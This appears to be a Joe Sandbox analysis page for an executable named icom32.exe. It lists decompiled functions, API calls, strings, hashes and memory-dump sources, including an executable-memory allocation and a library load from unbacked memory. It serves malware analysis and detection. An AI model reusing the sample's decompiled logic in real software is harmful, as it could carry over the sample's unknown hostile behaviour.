Instruction ID: d203aa3f00607ad04c758af9c7c462f385366fb73d2fe40a57cd753bf865eb1a
Opcode Fuzzy Hash: 3759a16f545ec28d4a32291382bd5c52e45aa4e5ebaebd88d0e51f5404919085
Instruction Fuzzy Hash: D1212E70D002089FDB00EFA5D989BAFBBB0EF44359F50457AF501B72A1D77C5A409BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A660, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040A660() {
				char _v10;
				char _v11;
				void* __edx;
				void* _t3;
				CHAR* _t11;

				_v11 = 0;
				_v10 = 0;
				E0040C570(_t3, _t11);
				CharUpperA(_t11); // executed
				return E0040A620(_t11);
			}

0x0040a667
0x0040a66b
0x0040a671
0x0040a679
0x0040a68b

APIs

CharUpperA.USER32(?,0040569C,00000108,004012E5), ref: 0040A679

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: CharUpper
String ID:
API String ID: 9403516-0
Opcode ID: 8d7bf7076c05b62678fd30f6f2e00f56e7bd62dffe09178eb605b327429d5de0
Instruction ID: c2f2f6c128974beaedef215e064c14e92f817ec8314dafa4f85048492d1a9ca6
Opcode Fuzzy Hash: 8d7bf7076c05b62678fd30f6f2e00f56e7bd62dffe09178eb605b327429d5de0
Instruction Fuzzy Hash: A4D0A7AAA0C3406EE44473362C4B44B3E254DE2114B18C53DF045532C1D839D81CC1A7

Uniqueness

Uniqueness Score: -1.00%

Function 0070008F, Relevance: 1.5, APIs: 1, Instructions: 7
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(0726774C,?,696E6977,0074656E), ref: 007000A0

Memory Dump Source

Source File: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_icom32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5a947e7f3338d89dec675f7ce1a8893158c68d3fedbd9699ec035027427ea175
Instruction ID: f6ac63cb588013cfe5c088028ed93f17fa7e1303260ebbbc7ebb43fe486b4e6b
Opcode Fuzzy Hash: 5a947e7f3338d89dec675f7ce1a8893158c68d3fedbd9699ec035027427ea175
Instruction Fuzzy Hash: 60A002C06DF30DF785427A729D0BF6D7D558903BB9B815212F59D249CA098F517440B7

Uniqueness

Uniqueness Score: -1.00%

Function 004072A0, Relevance: 1.3, APIs: 1, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004072A0(long __eax) {
				long _v12;
				void* _t7;
				void _t10;
				signed char* _t13;
				signed char _t14;
				signed char* _t20;
				void* _t21;
				void* _t22;

				_v12 = __eax;
				_t7 =  *0x40f5ec; // 0x1
				if(_t7 == 0) {
					L3:
					return _t7;
				} else {
					if( *0x40f560 == 0xfffffffe) {
						L2:
						return 0;
					}
					_t7 = E00407250(_t22);
					if(_t7 == 0) {
						goto L3;
					} else {
						_t7 = VirtualAlloc(0, _v12, 0x1000, 0x40); // executed
						_t21 = _t7;
						if(_t7 == 0) {
							goto L3;
						} else {
							_t10 = _v12 - 4;
							if(_t10 > _v12) {
								goto L2;
							}
							_v12 = _t10;
							if(_t10 < 0x38) {
								goto L2;
							}
							 *_t21 = _t10;
							_t13 = E004071D0(_t21);
							_t20 = _t13;
							_t14 =  *_t13;
							_v12 = _t14;
							 *_t20 = _t14 | 0x00000001;
							 *(_t21 + 0x14) = 0;
							_t3 =  &(_t20[4]); // 0x4
							 *((intOrPtr*)(_t21 + 0x18)) =  *((intOrPtr*)(_t21 + 0x18)) + 1;
							E00405860(_t3);
							return 1;
						}
					}
				}
			}

0x004072a5
0x004072a8
0x004072af
0x004072c1
0x004072c1
0x004072b1
0x004072b8
0x004072ba
0x00000000
0x004072ba
0x004072c4
0x004072cb
0x00000000
0x004072cd
0x004072db
0x004072e1
0x004072e5
0x00000000
0x004072e7
0x004072ea
0x004072f0
0x00000000
0x00000000
0x004072f2
0x004072f8
0x00000000
0x00000000
0x004072fa
0x004072fe
0x00407303
0x00407305
0x00407307
0x0040730c
0x0040730e
0x00407315
0x00407318
0x0040731b
0x0040732a
0x0040732a
0x004072e5
0x004072cb

APIs

VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040,00000000,004057D7), ref: 004072DB

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 741f407b4b878021d7c1669584926fbab229a44df92f37ffd3278c7f0eb23f0f
Instruction ID: 0c4ac13ef9e11472292295b197e2bc9d57cb47fc58576cf155ff2ce140d44433
Opcode Fuzzy Hash: 741f407b4b878021d7c1669584926fbab229a44df92f37ffd3278c7f0eb23f0f
Instruction Fuzzy Hash: 64016DB0A086019FE714AF35DD4571A77E0EB44310F14447EF445EA3C0EA78E881CBAA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004092B0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004092B0() {
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t13;

				_t5 = LoadLibraryA("USER32.DLL");
				if(_t5 != 0) {
					_t5 = GetProcAddress(_t5, "GetActiveWindow");
					_t13 = _t5;
					if(_t5 == 0) {
						goto L1;
					} else {
						return (_t13->i() & 0xffffff00 | _t8 != 0x00000000) & 0x000000ff;
					}
				} else {
					L1:
					return (_t5 & 0xffffff00 | 0 != 0x00000000) & 0x000000ff;
				}
			}

0x004092b8
0x004092c2
0x004092d8
0x004092de
0x004092e2
0x00000000
0x004092e4
0x004092f5
0x004092f5
0x004092c4
0x004092c4
0x004092d1
0x004092d1

APIs

LoadLibraryA.KERNEL32(USER32.DLL,?,?,?,0040939B), ref: 004092B8
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004092D8

Strings

USER32.DLL, xrefs: 004092B3
GetActiveWindow, xrefs: 004092D2

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetActiveWindow$USER32.DLL
API String ID: 2574300362-2978834555
Opcode ID: aa41012e003614bac9598ee60c18d2c929128a918c9f109c6a35c13f7d6bb3f8
Instruction ID: bc7590957f1ab36f4a0bee8f8d6d4acc2858bef8492d8a203a67883a3a6befc2
Opcode Fuzzy Hash: aa41012e003614bac9598ee60c18d2c929128a918c9f109c6a35c13f7d6bb3f8
Instruction Fuzzy Hash: 26E04FB6305B036BF71416F66D96B37228C8FC4321724847AA400E41C1EE78DC545028

Uniqueness

Uniqueness Score: -1.00%

Function 00409360, Relevance: 80.8, APIs: 8, Strings: 38, Instructions: 291
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00409360() {
				void* __ebx;
				signed int _t55;
				void* _t57;
				intOrPtr _t58;
				char* _t59;
				char* _t83;
				signed int _t85;
				intOrPtr _t132;
				signed int _t135;
				intOrPtr* _t156;
				char* _t174;
				char* _t177;
				signed int _t205;
				intOrPtr* _t206;
				signed int* _t207;
				signed int _t208;
				char* _t209;

				_t206 =  *((intOrPtr*)(_t209 + 0x118));
				_t156 =  *_t206;
				_t207 =  *(_t206 + 4);
				if( *0x410655 == 0) {
					 *0x410655 = 1;
					_t55 = E004092B0();
					__eflags = _t55;
					if(_t55 != 0) {
						goto L1;
					} else {
						_t57 = E0040AAF0();
						__eflags = _t57 - 0xffffffff;
						if(_t57 == 0xffffffff) {
							goto L1;
						} else {
							 *_t209 = 0;
							_t58 =  *_t156;
							__eflags = _t58 - 0xc0000090;
							if(__eflags >= 0) {
								if(__eflags <= 0) {
									_t174 = "The instruction at 0x00000000 caused an invalid operation floating point\nexception.\n";
									goto L8;
								} else {
									__eflags = _t58 - 0xc0000093;
									if(__eflags >= 0) {
										if(__eflags <= 0) {
											_t174 = "The instruction at 0x00000000 caused an underflow floating point exception.\n";
											goto L8;
										} else {
											__eflags = _t58 - 0xc00000fd;
											if(_t58 == 0xc00000fd) {
												_t174 = "A stack overflow was encountered at address 0x00000000.\n";
												goto L8;
											} else {
												__eflags = _t58 - 0xc0000096;
												if(_t58 == 0xc0000096) {
													_t174 = "A privileged instruction was executed at address 0x00000000.\n";
													goto L8;
												} else {
													__eflags = _t58 - 0xc0000094;
													if(_t58 != 0xc0000094) {
														goto L49;
													} else {
														_t174 = "An integer divide by zero was encountered at address 0x00000000.\n";
														goto L8;
													}
												}
											}
										}
									} else {
										__eflags = _t58 - 0xc0000092;
										if(_t58 != 0xc0000092) {
											_t174 = "The instruction at 0x00000000 caused an overflow floating point exception.\n";
										} else {
											__eflags = _t207[8] & 0x00000002;
											if((_t207[8] & 0x00000002) == 0) {
												_t174 = "The instruction at 0x00000000 caused a stack underflow floating point\nexception.\n";
											} else {
												_t174 = "The instruction at 0x00000000 caused a stack overflow floating point\nexception.\n";
											}
										}
										goto L8;
									}
								}
								L23:
								return 1;
								goto L51;
							} else {
								__eflags = _t58 - 0xc000008d;
								if(__eflags >= 0) {
									if(__eflags <= 0) {
										_t174 = "The instruction at 0x00000000 caused a denormal operand floating point\nexception.\n";
									} else {
										__eflags = _t58 - 0xc000008f;
										if(_t58 != 0xc000008f) {
											_t174 = "The instruction at 0x00000000 caused a division by zero floating point\nexception.\n";
										} else {
											_t174 = "The instruction at 0x00000000 caused an inexact value floating point\nexception.\n";
										}
									}
									goto L8;
								} else {
									__eflags = _t58 - 0xc000001d;
									if(_t58 != 0xc000001d) {
										__eflags = _t58 - 0xc0000005;
										if(_t58 != 0xc0000005) {
											L49:
											E00409300(_t209,  *_t156, "The program encountered exception 0x00000000 at ");
											_t174 = "address 0x00000000 and\ncannot continue.\n";
											goto L8;
										} else {
											E00409300(_t209,  *((intOrPtr*)(_t156 + 0xc)), "The instruction at 0x00000000 referenced memory ");
											E00409300(_t209,  *((intOrPtr*)(_t156 + 0x18)), "at 0x00000000.\nThe memory could not be ");
											__eflags =  *(_t156 + 0x14);
											if( *(_t156 + 0x14) != 0) {
												_t174 = "written.\n";
												_t59 = _t209;
												_t132 = 0;
											} else {
												_t174 = "read.\n";
												_t59 = _t209;
												_t132 = 0;
											}
											goto L9;
										}
										goto L51;
									} else {
										_t174 = "An illegal instruction was executed at address 0x00000000.\n";
										L8:
										_t59 = _t209;
										_t132 =  *((intOrPtr*)(_t156 + 0xc));
									}
								}
							}
							L9:
							E00409300(_t59, _t132, _t174);
							asm("repne scasb");
							WriteFile(GetStdHandle(0xfffffff4), _t209 + 0xc, 0xbadbac, _t209 + 0x104, 0);
							 *_t209 = 0;
							E00409300(_t209, E00409360, "Exception fielded by 0x00000000\n");
							asm("repne scasb");
							WriteFile(GetStdHandle(0xfffffff4), _t209 + 0xc, 0xbadbac, _t209 + 0x104, 0);
							 *_t209 = 0;
							__eflags =  *_t207 & 0x00010002;
							if(( *_t207 & 0x00010002) != 0) {
								E00409300(_t209, _t207[0x2c], "EAX=0x00000000 ");
								E00409300(_t209, _t207[0x29], "EBX=0x00000000 ");
								E00409300(_t209, _t207[0x2b], "ECX=0x00000000 ");
								E00409300(_t209, _t207[0x2a], "EDX=0x00000000\n");
								E00409300(_t209, _t207[0x28], "ESI=0x00000000 ");
								E00409300(_t209, _t207[0x27], "EDI=0x00000000 ");
							}
							__eflags =  *_t207 & 0x00010001;
							if(( *_t207 & 0x00010001) != 0) {
								E00409300(_t209, _t207[0x2d], "EBP=0x00000000 ");
								E00409300(_t209, _t207[0x31], "ESP=0x00000000\n");
								E00409300(_t209, _t207[0x2e], "EIP=0x00000000 ");
								E00409300(_t209, _t207[0x30], "EFL=0x00000000 ");
								E00409300(_t209, _t207[0x2f], "CS =0x00000000 ");
								E00409300(_t209, _t207[0x32], "SS =0x00000000\n");
							}
							__eflags =  *_t207 & 0x00010004;
							if(( *_t207 & 0x00010004) != 0) {
								E00409300(_t209, _t207[0x26], "DS =0x00000000 ");
								E00409300(_t209, _t207[0x25], "ES =0x00000000 ");
								E00409300(_t209, _t207[0x24], "FS =0x00000000 ");
								E00409300(_t209, _t207[0x23], "GS =0x00000000\n");
							}
							asm("repne scasb");
							WriteFile(GetStdHandle(0xfffffff4), _t209 + 0xc, 0xbadbac, _t209 + 0x104, 0);
							 *_t209 = 0;
							__eflags =  *_t207 & 0x00010001;
							if(( *_t207 & 0x00010001) != 0) {
								_t205 = 1;
								__eflags = 0;
								_t208 = _t207[0x31];
								E00409300(_t209, 0, "Stack dump (SS:ESP)\n");
								while(1) {
									__eflags = _t208 & 0x0000ffff;
									if((_t208 & 0x0000ffff) != 0) {
										_t177 = "0x00000000 ";
										_t135 =  *[ss:eax];
										_t83 = _t209;
									} else {
										_t177 = "-stack end\n";
										_t83 = _t209;
										_t135 = 0;
										__eflags = 0;
									}
									E00409300(_t83, _t135, _t177);
									_t85 = _t205;
									__eflags = _t85 % 6;
									if(_t85 % 6 == 0) {
										__eflags = 0;
										E00409300(_t209, 0, 0x409289);
									}
									asm("repne scasb");
									WriteFile(GetStdHandle(0xfffffff4), _t209 + 0xc, 0xbadbac, _t209 + 0x104, 0);
									 *_t209 = 0;
									__eflags = _t208 & 0x0000ffff;
									if((_t208 & 0x0000ffff) == 0) {
										goto L23;
									}
									_t205 = _t205 + 1;
									_t208 = _t208 + 4;
									__eflags = _t205 - 0x48;
									if(_t205 <= 0x48) {
										continue;
									}
									goto L23;
								}
							}
							goto L23;
						}
					}
				} else {
					L1:
					return 0;
				}
				L51:
			}

0x0040936a
0x00409371
0x00409374
0x0040937e
0x0040938f
0x00409396
0x0040939b
0x0040939d
0x00000000
0x0040939f
0x0040939f
0x004093a4
0x004093a7
0x00000000
0x004093a9
0x004093a9
0x004093ad
0x004093af
0x004093b4
0x00409672
0x00409751
0x00000000
0x00409678
0x00409678
0x0040967d
0x0040969e
0x00409747
0x00000000
0x004096a4
0x004096a4
0x004096a9
0x00409773
0x00000000
0x004096af
0x004096af
0x004096b4
0x00409769
0x00000000
0x004096ba
0x004096ba
0x004096bf
0x00000000
0x004096c5
0x004096c5
0x00000000
0x004096c5
0x004096bf
0x004096b4
0x004096a9
0x0040967f
0x0040967f
0x00409684
0x0040973d
0x0040968a
0x0040968a
0x0040968e
0x0040971f
0x00409694
0x00409694
0x00409694
0x0040968e
0x00000000
0x00409684
0x0040967d
0x00409660
0x0040966f
0x00000000
0x004093ba
0x004093ba
0x004093bf
0x004096cf
0x00409729
0x004096d1
0x004096d1
0x004096d6
0x00409733
0x004096d8
0x004096d8
0x004096d8
0x004096d6
0x00000000
0x004093c5
0x004093c5
0x004093ca
0x004096e2
0x004096e7
0x0040977d
0x00409786
0x0040978b
0x00000000
0x004096ed
0x004096f7
0x00409706
0x0040970b
0x0040970f
0x0040975b
0x00409760
0x00409762
0x00409711
0x00409711
0x00409716
0x00409718
0x00409718
0x00000000
0x0040970f
0x00000000
0x004093d0
0x004093d0
0x004093d5
0x004093d5
0x004093d7
0x004093d7
0x004093ca
0x004093bf
0x004093da
0x004093da
0x004093f2
0x0040940b
0x00409418
0x0040941c
0x00409434
0x00409448
0x0040944e
0x00409452
0x00409459
0x00409468
0x0040947a
0x0040948c
0x0040949e
0x004094b0
0x004094c2
0x004094c2
0x004094c7
0x004094ce
0x004094dd
0x004094ef
0x00409501
0x00409513
0x00409525
0x00409537
0x00409537
0x0040953c
0x00409543
0x00409552
0x00409564
0x00409576
0x00409588
0x00409588
0x004095a0
0x004095b4
0x004095ba
0x004095be
0x004095c5
0x004095d2
0x004095d7
0x004095d9
0x004095df
0x004095e4
0x004095e4
0x004095ea
0x00409797
0x0040979f
0x004097a1
0x004095f0
0x004095f0
0x004095f5
0x004095f7
0x004095f7
0x004095f7
0x004095f9
0x00409605
0x0040960c
0x0040960e
0x00409617
0x00409619
0x00409619
0x00409631
0x00409645
0x0040964b
0x0040964f
0x00409655
0x00000000
0x00000000
0x00409657
0x00409658
0x0040965b
0x0040965e
0x00000000
0x00000000
0x00000000
0x0040965e
0x004095e4
0x00000000
0x004095c5
0x004093a7
0x00409380
0x00409380
0x0040938c
0x0040938c
0x00000000

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,00000000), ref: 004093FF
WriteFile.KERNEL32(00000000,?,?,00000000), ref: 0040940B
GetStdHandle.KERNEL32(000000F4,?,?,?,00000000,?,?,00000000), ref: 00409441
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 00409448

Strings

ESP=0x00000000, xrefs: 004094E2
FS =0x00000000 , xrefs: 00409569
at 0x00000000.The memory could not be , xrefs: 004096FC
written., xrefs: 0040975B
An integer divide by zero was encountered at address 0x00000000., xrefs: 004096C5
The program encountered exception 0x00000000 at , xrefs: 0040977D
EBP=0x00000000 , xrefs: 004094D0
EBX=0x00000000 , xrefs: 0040946D
-stack end, xrefs: 004095F0
GS =0x00000000, xrefs: 0040957B
The instruction at 0x00000000 caused an invalid operation floating pointexception., xrefs: 00409751
ESI=0x00000000 , xrefs: 004094A3
The instruction at 0x00000000 caused an overflow floating point exception., xrefs: 0040973D
EDI=0x00000000 , xrefs: 004094B5
0x00000000 , xrefs: 00409797
An illegal instruction was executed at address 0x00000000., xrefs: 004093D0
EDX=0x00000000, xrefs: 00409491
The instruction at 0x00000000 caused an inexact value floating pointexception., xrefs: 004096D8
CS =0x00000000 , xrefs: 00409518
address 0x00000000 andcannot continue., xrefs: 0040978B
The instruction at 0x00000000 caused a stack overflow floating pointexception., xrefs: 00409694
Stack dump (SS:ESP), xrefs: 004095CB
ES =0x00000000 , xrefs: 00409557
The instruction at 0x00000000 referenced memory , xrefs: 004096ED
EAX=0x00000000 , xrefs: 0040945B
A privileged instruction was executed at address 0x00000000., xrefs: 00409769
DS =0x00000000 , xrefs: 00409545
SS =0x00000000, xrefs: 0040952A
The instruction at 0x00000000 caused an underflow floating point exception., xrefs: 00409747
ECX=0x00000000 , xrefs: 0040947F
read., xrefs: 00409711
The instruction at 0x00000000 caused a denormal operand floating pointexception., xrefs: 00409729
EIP=0x00000000 , xrefs: 004094F4
The instruction at 0x00000000 caused a stack underflow floating pointexception., xrefs: 0040971F
Exception fielded by 0x00000000, xrefs: 00409411
A stack overflow was encountered at address 0x00000000., xrefs: 00409773
The instruction at 0x00000000 caused a division by zero floating pointexception., xrefs: 00409733
EFL=0x00000000 , xrefs: 00409506

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: FileHandleWrite
String ID: -stack end$0x00000000 $A privileged instruction was executed at address 0x00000000.$A stack overflow was encountered at address 0x00000000.$An illegal instruction was executed at address 0x00000000.$An integer divide by zero was encountered at address 0x00000000.$CS =0x00000000 $DS =0x00000000 $EAX=0x00000000 $EBP=0x00000000 $EBX=0x00000000 $ECX=0x00000000 $EDI=0x00000000 $EDX=0x00000000$EFL=0x00000000 $EIP=0x00000000 $ES =0x00000000 $ESI=0x00000000 $ESP=0x00000000$Exception fielded by 0x00000000$FS =0x00000000 $GS =0x00000000$SS =0x00000000$Stack dump (SS:ESP)$The instruction at 0x00000000 caused a denormal operand floating pointexception.$The instruction at 0x00000000 caused a division by zero floating pointexception.$The instruction at 0x00000000 caused a stack overflow floating pointexception.$The instruction at 0x00000000 caused a stack underflow floating pointexception.$The instruction at 0x00000000 caused an inexact value floating pointexception.$The instruction at 0x00000000 caused an invalid operation floating pointexception.$The instruction at 0x00000000 caused an overflow floating point exception.$The instruction at 0x00000000 caused an underflow floating point exception.$The instruction at 0x00000000 referenced memory $The program encountered exception 0x00000000 at $address 0x00000000 andcannot continue.$at 0x00000000.The memory could not be $read.$written.
API String ID: 3320372497-1331860362
Opcode ID: 2370f7ff0e9524ec2c7466c72c9f395cdbc0b9cd2ed08f21228a73ba10d985ae
Instruction ID: abc709cd5361f47345cf2dc754c71f6acf8804fbb7e02d2d748819ffcd3c9898
Opcode Fuzzy Hash: 2370f7ff0e9524ec2c7466c72c9f395cdbc0b9cd2ed08f21228a73ba10d985ae
Instruction Fuzzy Hash: 06A180313142449BD724AA28CD95BAB33559B88314F20C53BF945BB7D7CB7C9C42CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408BF0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00408BF0(struct HINSTANCE__* __eax, int __ebx, short* __edx) {
				CHAR* _t9;
				int _t14;
				char* _t21;
				short* _t24;
				struct HINSTANCE__* _t25;

				_t25 = __eax;
				_t24 = __edx;
				if(GetVersion() >> 0x10 < 0x8000) {
					return GetModuleFileNameW(_t25, _t24, __ebx);
				} else {
					_t9 = E00405700(0x208);
					_t21 = _t9;
					if(_t9 != 0) {
						if(GetModuleFileNameA(_t25, _t9, 0x208) == 0) {
							E00405860(_t21);
							return 0;
						} else {
							_t14 = MultiByteToWideChar(1, 1, _t21, 0xffffffff, _t24, __ebx);
							E00405860(_t21);
							if(_t14 != 0) {
								 *((short*)(_t24 + __ebx * 2 - 2)) = 0;
								return E0040AA0D(_t24);
							} else {
								return 0;
							}
						}
					} else {
						return _t9;
					}
				}
			}

0x00408bf4
0x00408bf6
0x00408c07
0x00408c2b
0x00408c09
0x00408c0e
0x00408c13
0x00408c17
0x00408c3b
0x00408c62
0x00408c6d
0x00408c3d
0x00408c46
0x00408c50
0x00408c57
0x00408c70
0x00408c80
0x00408c59
0x00408c5f
0x00408c5f
0x00408c57
0x00408c1d
0x00408c1d
0x00408c1d
0x00408c17

APIs

GetVersion.KERNEL32(?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408BFA
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\icom32.exe,00000208,?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108), ref: 00408C21
GetModuleFileNameA.KERNEL32(00000000,00000000,00000208,?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108), ref: 00408C33
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,000000FF,C:\Users\user\Desktop\icom32.exe,00000208,?,00000000,00000000,?,00406D94,?,?,?,00406F40), ref: 00408C46

Strings

C:\Users\user\Desktop\icom32.exe, xrefs: 00408C1F, 00408C3E

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: FileModuleName$ByteCharMultiVersionWide
String ID: C:\Users\user\Desktop\icom32.exe
API String ID: 1868407593-2353288122
Opcode ID: bd26cdd842f5ce9db5bc70b6ce29cebca7aacf01639f56fd4a212c139b7e4937
Instruction ID: 682ea217144ef9e17e117eae914da8b79ce349e1dda49d29665941b9c0893443
Opcode Fuzzy Hash: bd26cdd842f5ce9db5bc70b6ce29cebca7aacf01639f56fd4a212c139b7e4937
Instruction Fuzzy Hash: 8001D2333062085AE71032BE6D0CEABB798CB81773B10467BF646E56C2DE79881042B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA60, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(conin$,80000000,00000001,00000000,00000003,00000080,00000000,?,?,0040AAF5,004093A4), ref: 0040AA9E
CreateFileA.KERNEL32(conout$,40000000,00000002,00000000,00000003,00000080,00000000,?,?,0040AAF5,004093A4), ref: 0040AAC2

Strings

conout$, xrefs: 0040AABD
conin$, xrefs: 0040AA99

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: CreateFile
String ID: conin$$conout$
API String ID: 823142352-2896197411
Opcode ID: 2c1829fd7a500fa5c22cd5ec2cde23f67342dd19cf146a907d6e8ba81a172e90
Instruction ID: ae2b7705fe4284713e848ac2ea8f4b133303a11b1e87af0c2ef50c1b0f87a402
Opcode Fuzzy Hash: 2c1829fd7a500fa5c22cd5ec2cde23f67342dd19cf146a907d6e8ba81a172e90
Instruction Fuzzy Hash: CFF01D70790300BAE6348F34BE0EF153650A384B25F308A36F252B84F1D7B5256ACA1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A500, Relevance: 6.1, APIs: 4, Instructions: 79
fileCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040A500(void* __eax, long __ebx, void* __edx) {
				void* _v20;
				long _v24;
				void* _t10;
				long _t21;
				long _t28;
				void* _t32;
				void* _t35;
				long _t37;
				long _t38;
				void* _t39;
				void* _t40;
				void* _t42;

				_t6 = __eax;
				_t39 = __eax;
				_t40 = __edx;
				_t38 = __ebx;
				if(__eax < 0) {
					L10:
					E0040A1BE(4);
					return 0xffffffff;
				}
				_t42 = _t6 -  *0x40f608; // 0x14
				if(_t42 >= 0) {
					goto L10;
				}
				_t10 = E004089F0(__eax);
				_t35 = _t10;
				_v20 = _t10;
				_t32 = 0;
				if((E0040A740(_t39) & 0x00000080) != 0) {
					 *0x40f518();
					_t32 = 1;
					if(SetFilePointer(_t35, 0, 0, 2) == 0xffffffff) {
						_t28 = GetLastError();
						 *0x40f51c();
						_t21 = _t28;
						L8:
						return E0040C500(_t21);
					}
				}
				if(WriteFile(_v20, _t40, _t38,  &_v24, 0) == 0) {
					_t37 = GetLastError();
					if(_t32 == 1) {
						 *0x40f51c();
					}
					_t21 = _t37;
					goto L8;
				}
				if(_t38 != _v24) {
					E0040A1BE(0xc);
				}
				if(_t32 == 1) {
					 *0x40f51c();
				}
				return _v24;
			}

0x0040a500
0x0040a507
0x0040a509
0x0040a50b
0x0040a50f
0x0040a594
0x0040a599
0x00000000
0x0040a59e
0x0040a515
0x0040a51b
0x00000000
0x00000000
0x0040a521
0x0040a526
0x0040a528
0x0040a52e
0x0040a537
0x0040a53b
0x0040a548
0x0040a556
0x0040a5a5
0x0040a5af
0x0040a5b5
0x0040a587
0x00000000
0x0040a587
0x0040a556
0x0040a56e
0x0040a576
0x0040a57b
0x0040a57f
0x0040a57f
0x0040a585
0x00000000
0x0040a585
0x0040a5bc
0x0040a5c3
0x0040a5c3
0x0040a5cb
0x0040a5cf
0x0040a5cf
0x0040a5df

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,004054EC,?), ref: 0040A54D
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,004054EC,?), ref: 0040A566
GetLastError.KERNEL32(?,004054EC,?), ref: 0040A570
GetLastError.KERNEL32(?,00000000,00000000,00000002,?,004054EC,?), ref: 0040A5A5

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
